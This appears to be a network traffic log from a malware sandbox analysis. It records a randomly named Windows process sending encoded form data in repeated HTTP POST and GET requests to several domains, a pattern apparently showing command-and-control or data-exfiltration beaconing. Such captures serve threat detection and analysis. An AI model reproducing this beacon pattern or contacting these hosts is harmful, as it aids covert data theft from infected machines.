                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:33:52.943339109 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              date: Mon, 08 Jul 2024 07:33:52 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1438
                                              x-request-id: a9685843-da1f-4032-8db6-64ac5ebe70db
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pgroo1Rskp5MNvxA00ab+0ayved/gjvmfYXzEzYSqFdv40wo8ZRWArWwguHa2M/bCZ925sVMYkO8ZyqhBhd07w==
                                              set-cookie: parking_session=a9685843-da1f-4032-8db6-64ac5ebe70db; expires=Mon, 08 Jul 2024 07:48:52 GMT; path=/
                                              connection: close
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pgroo1Rskp5MNvxA00ab+0ayved/gjvmfYXzEzYSqFdv40wo8ZRWArWwguHa2M/bCZ925sVMYkO8ZyqhBhd07w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 8, 2024 09:33:52.943762064 CEST | 891 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTk2ODU4NDMtZGExZi00MDMyLThkYjYtNjRhYzVlYmU3MGRiIiwicGFnZV90aW1lIjoxNzIwNDI0MD


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.4 | 49747 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:33:57.979538918 CEST | 746 | OUT | POST /3c39/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.boutiqueinaboxshop.com
                                              Origin: http://www.boutiqueinaboxshop.com
                                              Referer: http://www.boutiqueinaboxshop.com/3c39/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=VLd8nadGfr0IH4cpMs7aq88qLbUMrumaSOA8Een+FCfBX/HGGvNPpuHi+GXelIdVJ3rDA3aq3tNAYhynILHY7W0lpX4/d11fJO7xg/7Fg3TiFqg1qzZSFZUCEXsFaQrTKC9O1yF7aVftJa9rUOtN7cyuAnbARWAATslzMzG5jR8+rV2z93w5/iZmmBFzV4oeQQ==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.4 | 49748 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:34:00.509536028 CEST | 766 | OUT | POST /3c39/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.boutiqueinaboxshop.com
                                              Origin: http://www.boutiqueinaboxshop.com
                                              Referer: http://www.boutiqueinaboxshop.com/3c39/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=VLd8nadGfr0IHbUpPMHarc8rE7UMwemWSOM8EfzIFx7BOf3GHuNPuuHixmXf44deJ2XLA2mq3tJAYgunL4vf0m07i345TV1fJO7xg7rjg3LiGZo1sQBNapUNQHsFeQrpKC9g1zZFaTbtJbhrTftCwcysOHaPdkxFVM17TSm7glwuuTnpsGRuti9V7GMHY7VXLXVHbvC66i6w/I6kix2pQ2o=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:34:03.041343927 CEST | 10848 | OUT | POST /3c39/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.boutiqueinaboxshop.com
                                              Origin: http://www.boutiqueinaboxshop.com
                                              Referer: http://www.boutiqueinaboxshop.com/3c39/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl= [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.4 | 49750 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:34:05.572886944 CEST | 461 | OUT | GET /3c39/?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.boutiqueinaboxshop.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Timestamp: Jul 8, 2024 09:34:13.033412933 CEST | Bytes transferred: 390 | Direction: IN | Data:
                                              HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:34:12 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g="}</script></head></html>


                                              Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49751 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:18.247215033 CEST | Bytes transferred: 719 | Direction: OUT | Data:
                                              POST /ji0a/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.lmsforsme.com
                                              Origin: http://www.lmsforsme.com
                                              Referer: http://www.lmsforsme.com/ji0a/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=Y1OiPKzKD1v/U9Ql4aFStWkuqPjHZoesQYnUHAxswtfIYQSGJEOOw4dxy+SOzVpeqGcQxweSjJ9m4SYrl0CFBCz5EPurljKpLcpt8GEjJ5IlS4D2eANnn4MXjIdRlQ3G42V+X1CpkrC2+XXD+Af80zwZqXpk41wjF5epepFuNFaIFUO6ZILN0DaEBY2U7R46Xg==


                                              Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:20.774857044 CEST | Bytes transferred: 739 | Direction: OUT | Data:
                                              POST /ji0a/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.lmsforsme.com
                                              Origin: http://www.lmsforsme.com
                                              Referer: http://www.lmsforsme.com/ji0a/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=Y1OiPKzKD1v/UdMl659Sr2kp2/jHO4eoQYrUHBEpwZzIYy6GIAiOgodx5eTK3VpXqGRlxyKSjJ5m4XkrlHaGTiz7IvuprDKpLcpt8HgZJ5wlTLb2ehMx4IMYgIdRzg3K42VmX3nGkvy2+XnDw0D/9zwXk3on3l10dcj8Qr0ATXWyASfgI5qamD+3cf/g2SFzMsP3yjiZ/TPp3WRiNXft/Pc=


                                              Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49753 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:23.371140003 CEST | Bytes transferred: 10821 | Direction: OUT | Data:
                                              POST /ji0a/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.lmsforsme.com
                                              Origin: http://www.lmsforsme.com
                                              Referer: http://www.lmsforsme.com/ji0a/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                              Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:25.901145935 CEST | Bytes transferred: 452 | Direction: OUT | Data:
                                              GET /ji0a/?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.lmsforsme.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Timestamp: Jul 8, 2024 09:34:26.493890047 CEST | Bytes transferred: 390 | Direction: IN | Data:
                                              HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:34:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N"}</script></head></html>


                                              Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:31.526988983 CEST | Bytes transferred: 746 | Direction: OUT | Data:
                                              POST /sm5u/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.fundraiserstuffies.com
                                              Origin: http://www.fundraiserstuffies.com
                                              Referer: http://www.fundraiserstuffies.com/sm5u/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=+PxIFTONhKv1GHygBzaP0xHZFF3Fri1rwiH5wVnIY5qMw1Woh+kLwmFrqBJYgHKK5jhdSpWunmf9pLW9fCt2+jeTHmfGsU6b4bV6pbjajzCqkjjgHDvryoE2DYrAlpFlAInXCrU5VH7aO90ADzPhPMHa/wfNs6340bwMltbpZ2hZWuWHLLXBxKEyb8Z1ThUVLA==


                                              Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:34.062695026 CEST | Bytes transferred: 766 | Direction: OUT | Data:
                                              POST /sm5u/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.fundraiserstuffies.com
                                              Origin: http://www.fundraiserstuffies.com
                                              Referer: http://www.fundraiserstuffies.com/sm5u/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=+PxIFTONhKv1EmCgDUmPyRHaJl3FxS1vwiL5wXLYYLeMzUmozPkLzmFrtxJn4nKB5jcuSsWuniP9pKm9fVB1vjeRIGfXh06b4bV6pb3wjymqjTzgGivktYE1GorAhpFhAInhCuMfVFzaO8EACiPmEMHcige7g5Oi5adnsuLKYVQ4ToHda62WjKgBG7QBeipcQLBwBLJDc/KIddJ91X541vA=


                                              Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:36.606571913 CEST | Bytes transferred: 10848 | Direction: OUT | Data:
                                              POST /sm5u/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.fundraiserstuffies.com
                                              Origin: http://www.fundraiserstuffies.com
                                              Referer: http://www.fundraiserstuffies.com/sm5u/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                              Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:39.138565063 CEST | Bytes transferred: 461 | Direction: OUT | Data:
                                              GET /sm5u/?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.fundraiserstuffies.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Timestamp: Jul 8, 2024 09:34:39.617795944 CEST | Bytes transferred: 390 | Direction: IN | Data:
                                              HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:34:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E="}</script></head></html>


                                              Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 203.161.41.207 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:44.802546024 CEST | Bytes transferred: 716 | Direction: OUT | Data:
                                              POST /etzb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.soutsour.xyz
                                              Origin: http://www.soutsour.xyz
                                              Referer: http://www.soutsour.xyz/etzb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=/3NdX/cQ8G0DDUrs5cUggRQfF3CFhCrb3IClh+k1ZHC2D+07t/aVdgtDDmdg1WNiXQl4QdopjykePNpalewe1BhZfbTmyu8SUr9PvpZ7Q8w8MRQ3pafQNFsR12mkXIjT4r4KKNDDyR9wg+tjDoopCVNv2ldtwYvo6fy7OcQwY6mcqxCR94DXebppEHzd120LNg==
                                              Timestamp: Jul 8, 2024 09:34:45.390484095 CEST | Bytes transferred: 533 | Direction: IN | Data:
                                              HTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:34:45 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49760 | Destination IP: 203.161.41.207 | Destination Port: 80 | PID: 5764 | Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp: Jul 8, 2024 09:34:47.337887049 CEST | Bytes transferred: 736 | Direction: OUT | Data:
                                              POST /etzb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.soutsour.xyz
                                              Origin: http://www.soutsour.xyz
                                              Referer: http://www.soutsour.xyz/etzb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=/3NdX/cQ8G0DC1bsq/MglxQcYHCFvirf3I+lh/glZ1m2AbY7s66VegtDIGdf72N1XQpKQZopjyYePN5altoB1RhfLrTese8SUr9PvpdRQ9U8MFs3o+LRElsWy2mkBIjX4r4oKMeYyX5wg8ljD9IqYFNp4Fc9wLKb4PvyNfFXQJGqv3TLsJiAMbNaZA6p41JCWqmBveGyu83RApFq1GaVlG4=
                                              Timestamp: Jul 8, 2024 09:34:47.935069084 CEST | Bytes transferred: 533 | Direction: IN | Data:
                                              HTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:34:47 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449761203.161.41.207805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:34:49.873259068 CEST | 10818 | OUT | POST /etzb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.soutsour.xyz
                                              Origin: http://www.soutsour.xyz
                                              Referer: http://www.soutsour.xyz/etzb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 2f 33 4e 64 58 2f 63 51 38 47 30 44 43 31 62 73 71 2f 4d 67 6c 78 51 63 59 48 43 46 76 69 72 66 33 49 2b 6c 68 2f 67 6c 5a 31 75 32 44 74 4d 37 74 63 79 56 51 41 74 44 46 6d 64 6b 37 32 4e 4e 58 52 41 44 51 5a 74 55 6a 33 55 65 64 2f 42 61 6a 63 6f 42 36 52 68 66 55 37 54 6c 79 75 38 4c 55 71 4e 4c 76 70 4e 52 51 39 55 38 4d 44 49 33 72 71 66 52 43 6c 73 52 31 32 6d 53 58 49 6a 2f 34 72 68 66 4b 4e 71 49 78 6e 5a 77 75 38 31 6a 50 75 67 71 54 46 4e 72 37 46 64 34 77 4c 32 45 34 50 44 55 4e 65 41 77 51 4f 32 71 69 6a 54 63 35 35 6d 57 56 49 5a 39 45 58 61 54 7a 48 74 50 50 59 36 2f 2b 74 69 2b 35 75 44 45 47 59 55 34 6d 6e 37 53 30 43 4d 58 72 34 55 70 4d 35 66 4c 2f 38 61 53 44 6e 50 58 35 33 53 32 42 64 77 57 6d 6c 7a 47 58 76 44 78 79 38 74 65 4e 4c 36 74 72 45 64 54 44 78 44 67 44 76 34 6a 6d 71 44 72 6e 6f 41 38 78 31 36 36 69 4f 53 65 4a 73 43 6d 34 46 50 32 74 77 64 4a 4c 78 59 35 74 6c 53 4d 39 52 4b 34 37 33 53 72 6a 76 59 67 34 46 41 42 5a 2b 4e 4a 46 52 79 63 6b 74 74 79 4c 54 [TRUNCATED]
                                              Data Ascii: gNl=/3NdX/cQ8G0DC1bsq/MglxQcYHCFvirf3I+lh/glZ1u2DtM7tcyVQAtDFmdk72NNXRADQZtUj3Ued/BajcoB6RhfU7Tlyu8LUqNLvpNRQ9U8MDI3rqfRClsR12mSXIj/4rhfKNqIxnZwu81jPugqTFNr7Fd4wL2E4PDUNeAwQO2qijTc55mWVIZ9EXaTzHtPPY6/+ti+5uDEGYU4mn7S0CMXr4UpM5fL/8aSDnPX53S2BdwWmlzGXvDxy8teNL6trEdTDxDgDv4jmqDrnoA8x166iOSeJsCm4FP2twdJLxY5tlSM9RK473SrjvYg4FABZ+NJFRyckttyLTdV2RalaeXa7ezF83MauARxg4FabZ+UMrGOtR27o4CAr8FRxPgCLyz+kohFhkcNNSx5RekvWjGLkmbR1Veya6DDTsoCKoHcltkSSP4WVXzUDWKpnQSebXMRWS5y684z08d2DXfHGotR8M4AeRhbSEYWt0eromAy6OlajK5+LdrG0DMdV/dv4uB+JjdjwU/iWGz6N4y+91BZsnJTXiCHTKGZn+hv3ygRhJO3Iw6V3bRSX467L3ewHZRsAJOn3EKI6l3RnVX6c8Hku3+LlhAu0NpsPIcONVPcHkYjIEf0XbqiW0tH9WOAVIHc4cqVavDCBAhzQXMCxVHkMfJIp5DhZ47+aNCw+c7oeaf+3UiiIvSdEIxEv9/UMeG52FN/WTHJgqQXpvQv7icOkDOmpxbdMmCaMzybtHD2Zh2iadIOyOGymBVmuqr+jXO0/vyIocwvgHaNOYcgZuc2j+RFdwdX2i8X5GIUMkOXPYxiXcZdzTnFNfXZnP141NwWkt81REiQaH+0Nh+BpIx1GwPgCjGEr5d+0Uu8x0B+2gP2TlPOigu5hkcmukInnVYIbyyNmAlDIqtEZ1l+hsSWz+Cf5xNbU5Tmza+DEWJsjjIFzf3zK8tQBv4OwP1RjquUzwF89YEEBISFSlP2yOdgzHsoBmFrmDsSyuf3IsOln+IB [TRUNCATED]
                                              Jul 8, 2024 09:34:50.486083031 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:34:50 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
